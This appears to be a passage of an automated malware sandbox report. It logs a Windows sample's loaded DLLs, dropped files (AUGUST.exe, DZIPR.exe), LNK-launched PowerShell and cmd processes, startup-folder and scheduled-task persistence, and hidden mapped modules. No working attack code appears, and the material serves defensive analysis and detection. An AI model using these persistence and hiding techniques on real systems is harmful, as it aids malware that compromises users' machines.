                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wevtapi.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mstask.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dllJump to behavior
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wininet.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dzipr.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winmm.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: netutils.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: dbghelp.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pla.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: pdh.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: tdh.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: cabinet.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: wevtapi.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: shdocvw.dll
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeSection loaded: winhttp.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: winbrand.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: shdocvw.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\cmd.exeSection loaded: mstask.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: aepic.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dxgi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: propsys.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: urlmon.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wtsapi32.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wininet.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: dwmapi.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: iertutil.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: srvcli.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: netutils.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\explorer.exeSection loaded: shdocvw.dll
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                      Source: uvnhjq.19.drLNK file: ..\..\Roaming\Ruy_driverv2\DZIPR.exe
                      Source: BIT2369.tmp.21.drLNK file: ..\..\Roaming\Ruy_driverv2\DZIPR.exe
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Binary string: msacm32.pdbUGP source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647742900.0000000000482000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2757855590.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928565084.0000000000482000.00000008.00000001.01000000.00000000.sdmp, gps.28.dr
                      Source: Binary string: msacm32.pdb source: cmd.exe, 00000013.00000002.2647715986.0000000005950000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758923017.0000000005DB0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647742900.0000000000482000.00000008.00000001.01000000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929494459.0000000005010000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2757855590.0000000000482000.00000008.00000001.01000000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928565084.0000000000482000.00000008.00000001.01000000.00000000.sdmp, gps.28.dr
                      Source: Binary string: wntdll.pdbUGP source: DZIPR.exe, 00000011.00000002.2345624953.0000000003B30000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2344649003.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647242156.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647012116.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758662727.0000000005900000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758330772.0000000005467000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647951054.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648211502.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929229383.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2928936283.0000000004626000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758507951.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758130432.0000000004B11000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929126997.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928791787.00000000049B7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: DZIPR.exe, 00000011.00000002.2345624953.0000000003B30000.00000004.00000800.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2344649003.00000000037D4000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647242156.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000013.00000002.2647012116.0000000004B56000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758662727.0000000005900000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000018.00000002.2758330772.0000000005467000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2647951054.0000000004A87000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.2648211502.0000000004F20000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2929229383.0000000004AC0000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000001C.00000002.2928936283.0000000004626000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758507951.0000000004FD0000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001E.00000002.2758130432.0000000004B11000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2929126997.0000000004E90000.00000004.00001000.00020000.00000000.sdmp, explorer.exe, 0000001F.00000002.2928791787.00000000049B7000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: E:\App\DZIPR\SDFRM\Release\SDFRM.pdb source: AUGUST.exe, 00000010.00000003.2318798588.000000000278D000.00000004.00000020.00020000.00000000.sdmp, DZIPR.exe, 00000011.00000002.2346571707.000000006FA68000.00000002.00000001.01000000.00000007.sdmp, DZIPR.exe, 00000012.00000002.2402308889.000000006C538000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.exe, 00000017.00000002.2588762108.000000006FAE8000.00000002.00000001.01000000.0000000A.sdmp, DZIPR.dll.16.dr
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_00406D5D LoadLibraryA,GetProcAddress,GetModuleHandleW,GetWindow,GetWindow,LoadIconW,GetWindow,16_2_00406D5D
                      Source: gps.28.drStatic PE information: real checksum: 0x0 should be: 0x7d505
                      Source: DZIPR.dll.17.drStatic PE information: real checksum: 0x601f9 should be: 0x5ee7e
                      Source: DZIPR.dll.16.drStatic PE information: real checksum: 0x601f9 should be: 0x5ee7e
                      Source: AUGUST.exe.11.drStatic PE information: real checksum: 0x33302 should be: 0x4a3c93
                      Source: demhwk.19.drStatic PE information: real checksum: 0x0 should be: 0x7d505
                      Source: qapuwvr.24.drStatic PE information: real checksum: 0x0 should be: 0x7d505
                      Source: DZIPR.exe.16.drStatic PE information: section name: .didata
                      Source: DZIPR.exe.17.drStatic PE information: section name: .didata
                      Source: demhwk.19.drStatic PE information: section name: cmxvoc
                      Source: qapuwvr.24.drStatic PE information: section name: cmxvoc
                      Source: gps.28.drStatic PE information: section name: cmxvoc
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeCode function: 16_2_00411C20 push eax; ret 16_2_00411C4E
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA55401 push ecx; ret 17_2_6FA55414
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA551A1 push ecx; ret 17_2_6FA551B4
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C525401 push ecx; ret 18_2_6C525414
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C5251A1 push ecx; ret 18_2_6C5251B4
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAD5401 push ecx; ret 23_2_6FAD5414
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FAD51A1 push ecx; ret 23_2_6FAD51B4

                      Persistence and Installation Behavior

                      barindex
                      Windows shortcut file (LNK) starts blacklisted processes
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                      Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\System32\cmd.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exeJump to behavior
                      Source: LNK fileProcess created: C:\Windows\SysWOW64\cmd.exe
                      Source: C:\Users\user\DZIPR.exeFile created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.dllJump to dropped file
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\AUGUST.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\qapuwvrJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeFile created: C:\Users\user\DZIPR.dllJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\demhwkJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\gpsJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeFile created: C:\Users\user\DZIPR.exeJump to dropped file
                      Source: C:\Users\user\DZIPR.exeFile created: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeFile created: C:\Users\user\DZIPR.dllJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeFile created: C:\Users\user\DZIPR.exeJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\demhwkJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\qapuwvrJump to dropped file
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Users\user\AppData\Local\Temp\gpsJump to dropped file

                      Boot Survival

                      barindex
                      Drops PE files to the user root directory
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeFile created: C:\Users\user\DZIPR.dllJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\AUGUST.exeFile created: C:\Users\user\DZIPR.exeJump to dropped file
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT2369.tmpJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeFile created: C:\Windows\Tasks\lnfast_x64.jobJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BIT2369.tmpJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Found hidden mapped module (file has been removed from disk)
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\DEMHWK
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\QAPUWVR
                      Source: C:\Windows\SysWOW64\cmd.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\GPS
                      Source: C:\Users\user\DZIPR.exeCode function: 17_2_6FA4DE29 IsIconic,GetWindowPlacement,GetWindowRect,17_2_6FA4DE29
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 18_2_6C51DE29 IsIconic,GetWindowPlacement,GetWindowRect,18_2_6C51DE29
                      Source: C:\Users\user\AppData\Roaming\Ruy_driverv2\DZIPR.exeCode function: 23_2_6FACDE29 IsIconic,GetWindowPlacement,GetWindowRect,23_2_6FACDE29
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
